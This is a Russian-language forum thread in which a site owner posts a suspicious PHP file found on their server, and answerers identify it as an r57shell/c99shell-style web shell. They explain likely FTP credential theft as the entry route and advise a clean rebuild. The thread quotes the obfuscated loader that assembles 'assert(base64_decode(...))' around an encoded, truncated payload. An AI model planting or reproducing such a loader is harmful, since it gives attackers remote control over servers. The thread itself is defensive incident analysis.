Назад | Перейти на главную страницу

Таинственный файл на сервере - взлом или что-то еще?

В одном из наших каталогов обнаружен странный файл, который мы не создавали.

Он назывался ".moreinfoege.php.KJt". В каталоге у нас также был файл с именем moreinfo.php

В последнее время у нас возникли проблемы с сервером (взлом WordPress, DDoS-атака), поэтому мы находимся в режиме повышенной готовности к другим заражениям. Это взлом? Каким образом это могло попасть?

Вот как выглядело его содержимое (длинная бессмысленная строка, сокращенная, чтобы поместиться здесь):

<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>

Код скрывает тот факт, что он делает assert(base64_decode( текста от 'ZXZ до W =='.

Декодирование этого текста показывает другие строки, которые выполняют другое декодирование и распаковку, начиная с eval(gzinflate(base64_decode("5b3pe...

Без опубликованного полного кода я не вижу, что находится в конце кроличьей норы. Вы можете использовать этот сайт для декодирования каждого шага:

http://www.webutils.pl/index.php?idx=base64 (ПРИМЕЧАНИЕ: текст помещается в синее поле.)

Эта ссылка должна помочь во второй части: http://www.tareeinternet.com/scripts/decrypt.php

ОБНОВИТЬ: Судя по всему файлу, это вариант r57shell или c99shell. Он предоставляет веб-интерфейс вашему серверу для таких вещей, как выполнение операций из командной строки и взаимодействие с данными SQL.

На этом сайте есть пример того, как это выглядит: http://phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/

На этом сайте есть запись в блоге человека, у которого тоже была проблема: http://basus.net/?p=19

Похоже, что PHP закодирован в кодировке base64, чтобы усложнить понимание того, что происходит, но это трудно сказать без доступа к обоим рассматриваемым файлам. Я готов поспорить с большим количеством шоколада, что ваш хозяин все еще скомпрометирован.

В зависимости от того, какой доступ злоумышленникам удалось получить ранее и как вы восстановили его, могут остаться методы доступа.

Я рекомендую вам начать процедуру восстановления - установить новую ОС и восстановить свой сайт из заведомо исправной копии.

похоже на взлом. один из популярных в последнее время способов получить файлы такого типа - через ftp.

существует множество троянов, собирающих пароли от популярных ftp-клиентов Windows [например, Total Commander]. учетные данные передаются в управляющие узлы, которые либо напрямую, либо с других зараженных машин добавляют вредоносный код js / php в индексный файл, загружают вредоносные файлы .htaccess и т. д.

проверьте дату создания файла, попробуйте поговорить со своим хостинг-провайдером, чтобы получить логи ftp примерно в то время, когда этот файл был загружен.

на всякий случай ... - если это wordpress - резервные копии данных и кода; удалите все файлы php, просмотрите все шаблоны, восстановите приложение из свежей версии.